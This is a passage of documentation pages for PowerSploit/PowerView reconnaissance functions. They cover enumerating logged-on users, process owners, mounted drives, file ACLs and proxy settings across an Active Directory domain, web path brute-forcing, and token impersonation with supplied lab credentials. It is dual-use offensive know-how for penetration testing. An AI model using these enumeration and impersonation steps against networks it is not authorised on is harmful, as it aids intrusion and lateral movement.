| Aliases: Name 56 | 57 | Required: False 58 | Position: 1 59 | Default value: None 60 | Accept pipeline input: True (ByPropertyName, ByValue) 61 | Accept wildcard characters: False 62 | ``` 63 | 64 | ### -Credential 65 | A \[Management.Automation.PSCredential\] object of alternate credentials 66 | for connection to the target domain. 67 | 68 | ```yaml 69 | Type: PSCredential 70 | Parameter Sets: (All) 71 | Aliases: 72 | 73 | Required: False 74 | Position: Named 75 | Default value: [Management.Automation.PSCredential]::Empty 76 | Accept pipeline input: False 77 | Accept wildcard characters: False 78 | ``` 79 | 80 | ## INPUTS 81 | 82 | ## OUTPUTS 83 | 84 | ### PowerView.DomainTrust.NET 85 | 86 | A TrustRelationshipInformationCollection returned when using .NET methods (default). 87 | 88 | ## NOTES 89 | 90 | ## RELATED LINKS 91 | 92 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-HttpStatus.md: -------------------------------------------------------------------------------- 1 | # Get-HttpStatus 2 | 3 | ## SYNOPSIS 4 | Returns the HTTP Status Codes and full URL for specified paths. 5 | 6 | PowerSploit Function: Get-HttpStatus 7 | Author: Chris Campbell (@obscuresec) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Get-HttpStatus [-Target] [[-Path] ] [[-Port] ] [-UseSSL] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | A script to check for the existence of a path or file on a webserver. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*} 26 | ``` 27 | 28 | ### -------------------------- EXAMPLE 2 -------------------------- 29 | ``` 30 | Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL 31 | ``` 32 | 33 | ## PARAMETERS 34 | 35 | ### -Target 36 | Specifies the remote web host either by IP or hostname. 37 | 38 | ```yaml 39 | Type: String 40 | Parameter Sets: (All) 41 | Aliases: 42 | 43 | Required: True 44 | Position: 1 45 | Default value: None 46 | Accept pipeline input: False 47 | Accept wildcard characters: False 48 | ``` 49 | 50 | ### -Path 51 | Specifies the remost host. 52 | 53 | ```yaml 54 | Type: String 55 | Parameter Sets: (All) 56 | Aliases: 57 | 58 | Required: False 59 | Position: 2 60 | Default value: .\Dictionaries\admin.txt 61 | Accept pipeline input: False 62 | Accept wildcard characters: False 63 | ``` 64 | 65 | ### -Port 66 | Specifies the port to connect to. 67 | 68 | ```yaml 69 | Type: Int32 70 | Parameter Sets: (All) 71 | Aliases: 72 | 73 | Required: False 74 | Position: 3 75 | Default value: 0 76 | Accept pipeline input: False 77 | Accept wildcard characters: False 78 | ``` 79 | 80 | ### -UseSSL 81 | Use an SSL connection. 82 | 83 | ```yaml 84 | Type: SwitchParameter 85 | Parameter Sets: (All) 86 | Aliases: 87 | 88 | Required: False 89 | Position: Named 90 | Default value: False 91 | Accept pipeline input: False 92 | Accept wildcard characters: False 93 | ``` 94 | 95 | ## INPUTS 96 | 97 | ## OUTPUTS 98 | 99 | ## NOTES 100 | HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error 101 | 102 | ## RELATED LINKS 103 | 104 | [http://obscuresecurity.blogspot.com 105 | http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]() 106 | 107 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-NetComputerSiteName.md: -------------------------------------------------------------------------------- 1 | # Get-NetComputerSiteName 2 | 3 | ## SYNOPSIS 4 | Returns the AD site where the local (or a remote) machine resides. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-NetComputerSiteName [[-ComputerName] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | This function will use the DsGetSiteName Win32API call to look up the 18 | name of the site where a specified computer resides. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local 25 | ``` 26 | 27 | Returns the site for WINDOWS1.testlab.local. 28 | 29 | ### -------------------------- EXAMPLE 2 -------------------------- 30 | ``` 31 | Get-DomainComputer | Get-NetComputerSiteName 32 | ``` 33 | 34 | Returns the sites for every machine in AD. 35 | 36 | ### -------------------------- EXAMPLE 3 -------------------------- 37 | ``` 38 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 39 | ``` 40 | 41 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 42 | Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred 43 | 44 | ## PARAMETERS 45 | 46 | ### -ComputerName 47 | Specifies the hostname to check the site for (also accepts IP addresses). 48 | Defaults to 'localhost'. 49 | 50 | ```yaml 51 | Type: String[] 52 | Parameter Sets: (All) 53 | Aliases: HostName, dnshostname, name 54 | 55 | Required: False 56 | Position: 1 57 | Default value: Localhost 58 | Accept pipeline input: True (ByPropertyName, ByValue) 59 | Accept wildcard characters: False 60 | ``` 61 | 62 | ### -Credential 63 | A \[Management.Automation.PSCredential\] object of alternate credentials 64 | for connection to the remote system using Invoke-UserImpersonation. 65 | 66 | ```yaml 67 | Type: PSCredential 68 | Parameter Sets: (All) 69 | Aliases: 70 | 71 | Required: False 72 | Position: Named 73 | Default value: [Management.Automation.PSCredential]::Empty 74 | Accept pipeline input: False 75 | Accept wildcard characters: False 76 | ``` 77 | 78 | ## INPUTS 79 | 80 | ## OUTPUTS 81 | 82 | ### PowerView.ComputerSite 83 | 84 | A PSCustomObject containing the ComputerName, IPAddress, and associated Site name. 85 | 86 | ## NOTES 87 | 88 | ## RELATED LINKS 89 | 90 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-PathAcl.md: -------------------------------------------------------------------------------- 1 | # Get-PathAcl 2 | 3 | ## SYNOPSIS 4 | Enumerates the ACL for a given file path. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-PathAcl [-Path] [[-Credential] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Enumerates the ACL for a specified file/folder path, and translates 18 | the access rules for each entry into readable formats. 19 | If -Credential is passed, 20 | Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Get-PathAcl "\\SERVER\Share\" 27 | ``` 28 | 29 | Returns ACLs for the given UNC share. 30 | 31 | ### -------------------------- EXAMPLE 2 -------------------------- 32 | ``` 33 | gci .\test.txt | Get-PathAcl 34 | ``` 35 | 36 | ### -------------------------- EXAMPLE 3 -------------------------- 37 | ``` 38 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 39 | ``` 40 | 41 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) 42 | Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred 43 | 44 | ## PARAMETERS 45 | 46 | ### -Path 47 | Specifies the local or remote path to enumerate the ACLs for. 48 | 49 | ```yaml 50 | Type: String[] 51 | Parameter Sets: (All) 52 | Aliases: FullName 53 | 54 | Required: True 55 | Position: 1 56 | Default value: None 57 | Accept pipeline input: True (ByPropertyName, ByValue) 58 | Accept wildcard characters: False 59 | ``` 60 | 61 | ### -Credential 62 | A \[Management.Automation.PSCredential\] object of alternate credentials 63 | for connection to the target path. 64 | 65 | ```yaml 66 | Type: PSCredential 67 | Parameter Sets: (All) 68 | Aliases: 69 | 70 | Required: False 71 | Position: 2 72 | Default value: [Management.Automation.PSCredential]::Empty 73 | Accept pipeline input: False 74 | Accept wildcard characters: False 75 | ``` 76 | 77 | ## INPUTS 78 | 79 | ### String 80 | 81 | One of more paths to enumerate ACLs for. 82 | 83 | ## OUTPUTS 84 | 85 | ### PowerView.FileACL 86 | 87 | A custom object with the full path and associated ACL entries. 88 | 89 | ## NOTES 90 | 91 | ## RELATED LINKS 92 | 93 | [https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144) 94 | 95 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-RegLoggedOn.md: -------------------------------------------------------------------------------- 1 | # Get-RegLoggedOn 2 | 3 | ## SYNOPSIS 4 | Returns who is logged onto the local (or a remote) machine 5 | through enumeration of remote registry keys. 6 | 7 | Note: This function requires only domain user rights on the 8 | machine you're enumerating, but remote registry must be enabled. 9 | 10 | Author: Matt Kelly (@BreakersAll) 11 | License: BSD 3-Clause 12 | Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID 13 | 14 | ## SYNTAX 15 | 16 | ``` 17 | Get-RegLoggedOn [[-ComputerName] ] 18 | ``` 19 | 20 | ## DESCRIPTION 21 | This function will query the HKU registry values to retrieve the local 22 | logged on users SID and then attempt and reverse it. 23 | Adapted technique from Sysinternal's PSLoggedOn script. 24 | Benefit over 25 | using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges 26 | required (NetWkstaUserEnum requires remote admin access). 27 | 28 | ## EXAMPLES 29 | 30 | ### -------------------------- EXAMPLE 1 -------------------------- 31 | ``` 32 | Get-RegLoggedOn 33 | ``` 34 | 35 | Returns users actively logged onto the local host. 36 | 37 | ### -------------------------- EXAMPLE 2 -------------------------- 38 | ``` 39 | Get-RegLoggedOn -ComputerName sqlserver 40 | ``` 41 | 42 | Returns users actively logged onto the 'sqlserver' host. 43 | 44 | ### -------------------------- EXAMPLE 3 -------------------------- 45 | ``` 46 | Get-DomainController | Get-RegLoggedOn 47 | ``` 48 | 49 | Returns users actively logged on all domain controllers. 50 | 51 | ### -------------------------- EXAMPLE 4 -------------------------- 52 | ``` 53 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 54 | ``` 55 | 56 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 57 | Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred 58 | 59 | ## PARAMETERS 60 | 61 | ### -ComputerName 62 | Specifies the hostname to query for remote registry values (also accepts IP addresses). 63 | Defaults to 'localhost'. 64 | 65 | ```yaml 66 | Type: String[] 67 | Parameter Sets: (All) 68 | Aliases: HostName, dnshostname, name 69 | 70 | Required: False 71 | Position: 1 72 | Default value: Localhost 73 | Accept pipeline input: True (ByPropertyName, ByValue) 74 | Accept wildcard characters: False 75 | ``` 76 | 77 | ## INPUTS 78 | 79 | ## OUTPUTS 80 | 81 | ### PowerView.RegLoggedOnUser 82 | 83 | A PSCustomObject including the UserDomain/UserName/UserSID of each 84 | actively logged on user, with the ComputerName added. 85 | 86 | ## NOTES 87 | 88 | ## RELATED LINKS 89 | 90 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-WMIProcess.md: -------------------------------------------------------------------------------- 1 | # Get-WMIProcess 2 | 3 | ## SYNOPSIS 4 | Returns a list of processes and their owners on the local or remote machine. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-WMIProcess [[-ComputerName] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine, 18 | including the owners of the particular process. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-WMIProcess -ComputerName WINDOWS1 25 | ``` 26 | 27 | ### -------------------------- EXAMPLE 2 -------------------------- 28 | ``` 29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 30 | ``` 31 | 32 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 33 | Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred 34 | 35 | ## PARAMETERS 36 | 37 | ### -ComputerName 38 | Specifies the hostname to query for cached RDP connections (also accepts IP addresses). 39 | Defaults to 'localhost'. 40 | 41 | ```yaml 42 | Type: String[] 43 | Parameter Sets: (All) 44 | Aliases: HostName, dnshostname, name 45 | 46 | Required: False 47 | Position: 1 48 | Default value: Localhost 49 | Accept pipeline input: True (ByPropertyName, ByValue) 50 | Accept wildcard characters: False 51 | ``` 52 | 53 | ### -Credential 54 | A \[Management.Automation.PSCredential\] object of alternate credentials 55 | for connection to the remote system. 56 | 57 | ```yaml 58 | Type: PSCredential 59 | Parameter Sets: (All) 60 | Aliases: 61 | 62 | Required: False 63 | Position: Named 64 | Default value: [Management.Automation.PSCredential]::Empty 65 | Accept pipeline input: False 66 | Accept wildcard characters: False 67 | ``` 68 | 69 | ## INPUTS 70 | 71 | ## OUTPUTS 72 | 73 | ### PowerView.UserProcess 74 | 75 | A PSCustomObject containing the remote process information. 76 | 77 | ## NOTES 78 | 79 | ## RELATED LINKS 80 | 81 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-WMIRegLastLoggedOn.md: -------------------------------------------------------------------------------- 1 | # Get-WMIRegLastLoggedOn 2 | 3 | ## SYNOPSIS 4 | Returns the last user who logged onto the local (or a remote) machine. 5 | 6 | Note: This function requires administrative rights on the machine you're enumerating. 7 | 8 | Author: Will Schroeder (@harmj0y) 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Get-WMIRegLastLoggedOn [[-ComputerName] ] [-Credential ] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | This function uses remote registry to enumerate the LastLoggedOnUser registry key 20 | for the local (or remote) machine. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Get-WMIRegLastLoggedOn 27 | ``` 28 | 29 | Returns the last user logged onto the local machine. 30 | 31 | ### -------------------------- EXAMPLE 2 -------------------------- 32 | ``` 33 | Get-WMIRegLastLoggedOn -ComputerName WINDOWS1 34 | ``` 35 | 36 | Returns the last user logged onto WINDOWS1 37 | 38 | ### -------------------------- EXAMPLE 3 -------------------------- 39 | ``` 40 | Get-DomainComputer | Get-WMIRegLastLoggedOn 41 | ``` 42 | 43 | Returns the last user logged onto all machines in the domain. 44 | 45 | ### -------------------------- EXAMPLE 4 -------------------------- 46 | ``` 47 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 48 | ``` 49 | 50 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 51 | Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred 52 | 53 | ## PARAMETERS 54 | 55 | ### -ComputerName 56 | Specifies the hostname to query for remote registry values (also accepts IP addresses). 57 | Defaults to 'localhost'. 58 | 59 | ```yaml 60 | Type: String[] 61 | Parameter Sets: (All) 62 | Aliases: HostName, dnshostname, name 63 | 64 | Required: False 65 | Position: 1 66 | Default value: Localhost 67 | Accept pipeline input: True (ByPropertyName, ByValue) 68 | Accept wildcard characters: False 69 | ``` 70 | 71 | ### -Credential 72 | A \[Management.Automation.PSCredential\] object of alternate credentials 73 | for connecting to the remote system. 74 | 75 | ```yaml 76 | Type: PSCredential 77 | Parameter Sets: (All) 78 | Aliases: 79 | 80 | Required: False 81 | Position: Named 82 | Default value: [Management.Automation.PSCredential]::Empty 83 | Accept pipeline input: False 84 | Accept wildcard characters: False 85 | ``` 86 | 87 | ## INPUTS 88 | 89 | ## OUTPUTS 90 | 91 | ### PowerView.LastLoggedOnUser 92 | 93 | A PSCustomObject containing the ComputerName and last loggedon user. 94 | 95 | ## NOTES 96 | 97 | ## RELATED LINKS 98 | 99 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-WMIRegMountedDrive.md: -------------------------------------------------------------------------------- 1 | # Get-WMIRegMountedDrive 2 | 3 | ## SYNOPSIS 4 | Returns information about saved network mounted drives for the local (or remote) machine. 5 | 6 | Note: This function requires administrative rights on the machine you're enumerating. 7 | 8 | Author: Will Schroeder (@harmj0y) 9 | License: BSD 3-Clause 10 | Required Dependencies: ConvertFrom-SID 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Get-WMIRegMountedDrive [[-ComputerName] ] [-Credential ] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | Uses remote registry functionality to enumerate recently mounted network drives. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-WMIRegMountedDrive 26 | ``` 27 | 28 | Returns the saved network mounted drives for the local machine. 29 | 30 | ### -------------------------- EXAMPLE 2 -------------------------- 31 | ``` 32 | Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local 33 | ``` 34 | 35 | Returns the saved network mounted drives for the WINDOWS2.testlab.local machine 36 | 37 | ### -------------------------- EXAMPLE 3 -------------------------- 38 | ``` 39 | Get-DomainComputer | Get-WMIRegMountedDrive 40 | ``` 41 | 42 | Returns the saved network mounted drives for all machines in the domain. 43 | 44 | ### -------------------------- EXAMPLE 4 -------------------------- 45 | ``` 46 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 47 | ``` 48 | 49 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 50 | Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred 51 | 52 | ## PARAMETERS 53 | 54 | ### -ComputerName 55 | Specifies the hostname to query for mounted drive information (also accepts IP addresses). 56 | Defaults to 'localhost'. 57 | 58 | ```yaml 59 | Type: String[] 60 | Parameter Sets: (All) 61 | Aliases: HostName, dnshostname, name 62 | 63 | Required: False 64 | Position: 1 65 | Default value: Localhost 66 | Accept pipeline input: True (ByPropertyName, ByValue) 67 | Accept wildcard characters: False 68 | ``` 69 | 70 | ### -Credential 71 | A \[Management.Automation.PSCredential\] object of alternate credentials 72 | for connecting to the remote system. 73 | 74 | ```yaml 75 | Type: PSCredential 76 | Parameter Sets: (All) 77 | Aliases: 78 | 79 | Required: False 80 | Position: Named 81 | Default value: [Management.Automation.PSCredential]::Empty 82 | Accept pipeline input: False 83 | Accept wildcard characters: False 84 | ``` 85 | 86 | ## INPUTS 87 | 88 | ## OUTPUTS 89 | 90 | ### PowerView.RegMountedDrive 91 | 92 | A PSCustomObject containing the ComputerName and mounted drive information. 93 | 94 | ## NOTES 95 | 96 | ## RELATED LINKS 97 | 98 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-WMIRegProxy.md: -------------------------------------------------------------------------------- 1 | # Get-WMIRegProxy 2 | 3 | ## SYNOPSIS 4 | Enumerates the proxy server and WPAD conents for the current user. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-WMIRegProxy [[-ComputerName] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Enumerates the proxy server and WPAD specification for the current user 18 | on the local machine (default), or a machine specified with -ComputerName. 19 | It does this by enumerating settings from 20 | HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Get-WMIRegProxy 27 | ``` 28 | 29 | ComputerName ProxyServer AutoConfigURL Wpad 30 | ------------ ----------- ------------- ---- 31 | WINDOWS1 http://primary.test... 32 | 33 | ### -------------------------- EXAMPLE 2 -------------------------- 34 | ``` 35 | $Cred = Get-Credential "TESTLAB\administrator" 36 | ``` 37 | 38 | Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local 39 | 40 | ComputerName ProxyServer AutoConfigURL Wpad 41 | ------------ ----------- ------------- ---- 42 | windows1.testlab.local primary.testlab.local 43 | 44 | ## PARAMETERS 45 | 46 | ### -ComputerName 47 | Specifies the system to enumerate proxy settings on. 48 | Defaults to the local host. 49 | 50 | ```yaml 51 | Type: String[] 52 | Parameter Sets: (All) 53 | Aliases: HostName, dnshostname, name 54 | 55 | Required: False 56 | Position: 1 57 | Default value: $Env:COMPUTERNAME 58 | Accept pipeline input: True (ByPropertyName, ByValue) 59 | Accept wildcard characters: False 60 | ``` 61 | 62 | ### -Credential 63 | A \[Management.Automation.PSCredential\] object of alternate credentials 64 | for connecting to the remote system. 65 | 66 | ```yaml 67 | Type: PSCredential 68 | Parameter Sets: (All) 69 | Aliases: 70 | 71 | Required: False 72 | Position: Named 73 | Default value: [Management.Automation.PSCredential]::Empty 74 | Accept pipeline input: False 75 | Accept wildcard characters: False 76 | ``` 77 | 78 | ## INPUTS 79 | 80 | ### String 81 | 82 | Accepts one or more computer name specification strings on the pipeline (netbios or FQDN). 83 | 84 | ## OUTPUTS 85 | 86 | ### PowerView.ProxySettings 87 | 88 | Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. 89 | 90 | ## NOTES 91 | 92 | ## RELATED LINKS 93 | 94 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Invoke-RevertToSelf.md: -------------------------------------------------------------------------------- 1 | # Invoke-RevertToSelf 2 | 3 | ## SYNOPSIS 4 | Reverts any token impersonation. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Invoke-RevertToSelf [[-TokenHandle] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | This function uses RevertToSelf() to revert any impersonated tokens. 18 | If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation), 19 | CloseHandle() is used to close the opened handle. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 26 | ``` 27 | 28 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 29 | $Token = Invoke-UserImpersonation -Credential $Cred 30 | Invoke-RevertToSelf -TokenHandle $Token 31 | 32 | ## PARAMETERS 33 | 34 | ### -TokenHandle 35 | An optional IntPtr TokenHandle returned by Invoke-UserImpersonation. 36 | 37 | ```yaml 38 | Type: IntPtr 39 | Parameter Sets: (All) 40 | Aliases: 41 | 42 | Required: False 43 | Position: 1 44 | Default value: None 45 | Accept pipeline input: False 46 | Accept wildcard characters: False 47 | ``` 48 | 49 | ## INPUTS 50 | 51 | ## OUTPUTS 52 | 53 | ## NOTES 54 | 55 | ## RELATED LINKS 56 | 57 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Invoke-UserImpersonation.md: -------------------------------------------------------------------------------- 1 | # Invoke-UserImpersonation 2 | 3 | ## SYNOPSIS 4 | Creates a new "runas /netonly" type logon and impersonates the token. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ### Credential (Default) 13 | ``` 14 | Invoke-UserImpersonation -Credential [-Quiet] 15 | ``` 16 | 17 | ### TokenHandle 18 | ``` 19 | Invoke-UserImpersonation -TokenHandle [-Quiet] 20 | ``` 21 | 22 | ## DESCRIPTION 23 | This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType 24 | to simulate "runas /netonly". 25 | The resulting token is then impersonated with 26 | ImpersonateLoggedOnUser() and the token handle is returned for later usage 27 | with Invoke-RevertToSelf. 28 | 29 | ## EXAMPLES 30 | 31 | ### -------------------------- EXAMPLE 1 -------------------------- 32 | ``` 33 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 34 | ``` 35 | 36 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 37 | Invoke-UserImpersonation -Credential $Cred 38 | 39 | ## PARAMETERS 40 | 41 | ### -Credential 42 | A \[Management.Automation.PSCredential\] object with alternate credentials 43 | to impersonate in the current thread space. 44 | 45 | ```yaml 46 | Type: PSCredential 47 | Parameter Sets: Credential 48 | Aliases: 49 | 50 | Required: True 51 | Position: Named 52 | Default value: None 53 | Accept pipeline input: False 54 | Accept wildcard characters: False 55 | ``` 56 | 57 | ### -TokenHandle 58 | An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation. 59 | If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser() 60 | is executed. 61 | 62 | ```yaml 63 | Type: IntPtr 64 | Parameter Sets: TokenHandle 65 | Aliases: 66 | 67 | Required: True 68 | Position: Named 69 | Default value: None 70 | Accept pipeline input: False 71 | Accept wildcard characters: False 72 | ``` 73 | 74 | ### -Quiet 75 | Suppress any warnings about STA vs MTA. 76 | 77 | ```yaml 78 | Type: SwitchParameter 79 | Parameter Sets: (All) 80 | Aliases: 81 | 82 | Required: False 83 | Position: Named 84 | Default value: False 85 | Accept pipeline input: False 86 | Accept wildcard characters: False 87 | ``` 88 | 89 | ## INPUTS 90 | 91 | ## OUTPUTS 92 | 93 | ### IntPtr 94 | 95 | The TokenHandle result from LogonUser. 96 | 97 | ## NOTES 98 | 99 | ## RELATED LINKS 100 | 101 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Remove-RemoteConnection.md: -------------------------------------------------------------------------------- 1 | # Remove-RemoteConnection 2 | 3 | ## SYNOPSIS 4 | Destroys a connection created by New-RemoteConnection. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ### ComputerName (Default) 13 | ``` 14 | Remove-RemoteConnection [-ComputerName] 15 | ``` 16 | 17 | ### Path 18 | ``` 19 | Remove-RemoteConnection [-Path] 20 | ``` 21 | 22 | ## DESCRIPTION 23 | This function uses WNetCancelConnection2 to destroy a connection created by 24 | New-RemoteConnection. 25 | If a -Path isn't specified, a -ComputerName is required to 26 | 'unmount' \\\\$ComputerName\IPC$. 27 | 28 | ## EXAMPLES 29 | 30 | ### -------------------------- EXAMPLE 1 -------------------------- 31 | ``` 32 | Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local' 33 | ``` 34 | 35 | ### -------------------------- EXAMPLE 2 -------------------------- 36 | ``` 37 | Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' 38 | ``` 39 | 40 | ### -------------------------- EXAMPLE 3 -------------------------- 41 | ``` 42 | @('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection 43 | ``` 44 | 45 | ## PARAMETERS 46 | 47 | ### -ComputerName 48 | Specifies the system to remove a \\\\ComputerName\IPC$ connection for. 49 | 50 | ```yaml 51 | Type: String[] 52 | Parameter Sets: ComputerName 53 | Aliases: HostName, dnshostname, name 54 | 55 | Required: True 56 | Position: 1 57 | Default value: None 58 | Accept pipeline input: True (ByPropertyName, ByValue) 59 | Accept wildcard characters: False 60 | ``` 61 | 62 | ### -Path 63 | Specifies the remote \\\\UNC\path to remove the connection for. 64 | 65 | ```yaml 66 | Type: String[] 67 | Parameter Sets: Path 68 | Aliases: 69 | 70 | Required: True 71 | Position: 1 72 | Default value: None 73 | Accept pipeline input: False 74 | Accept wildcard characters: False 75 | ``` 76 | 77 | ## INPUTS 78 | 79 | ## OUTPUTS 80 | 81 | ## NOTES 82 | 83 | ## RELATED LINKS 84 | 85 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Resolve-IPAddress.md: -------------------------------------------------------------------------------- 1 | # Resolve-IPAddress 2 | 3 | ## SYNOPSIS 4 | Resolves a given hostename to its associated IPv4 address. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Resolve-IPAddress [[-ComputerName] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Resolves a given hostename to its associated IPv4 address using 18 | \[Net.Dns\]::GetHostEntry(). 19 | If no hostname is provided, the default 20 | is the IP address of the localhost. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Resolve-IPAddress -ComputerName SERVER 27 | ``` 28 | 29 | ### -------------------------- EXAMPLE 2 -------------------------- 30 | ``` 31 | @("SERVER1", "SERVER2") | Resolve-IPAddress 32 | ``` 33 | 34 | ## PARAMETERS 35 | 36 | ### -ComputerName 37 | {{Fill ComputerName Description}} 38 | 39 | ```yaml 40 | Type: String[] 41 | Parameter Sets: (All) 42 | Aliases: HostName, dnshostname, name 43 | 44 | Required: False 45 | Position: 1 46 | Default value: $Env:COMPUTERNAME 47 | Accept pipeline input: True (ByPropertyName, ByValue) 48 | Accept wildcard characters: False 49 | ``` 50 | 51 | ## INPUTS 52 | 53 | ### String 54 | 55 | Accepts one or more IP address strings on the pipeline. 56 | 57 | ## OUTPUTS 58 | 59 | ### System.Management.Automation.PSCustomObject 60 | 61 | A custom PSObject with the ComputerName and IPAddress. 62 | 63 | ## NOTES 64 | 65 | ## RELATED LINKS 66 | 67 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/ScriptModification/Out-CompressedDll.md: -------------------------------------------------------------------------------- 1 | # Out-CompressedDll 2 | 3 | ## SYNOPSIS 4 | Compresses, 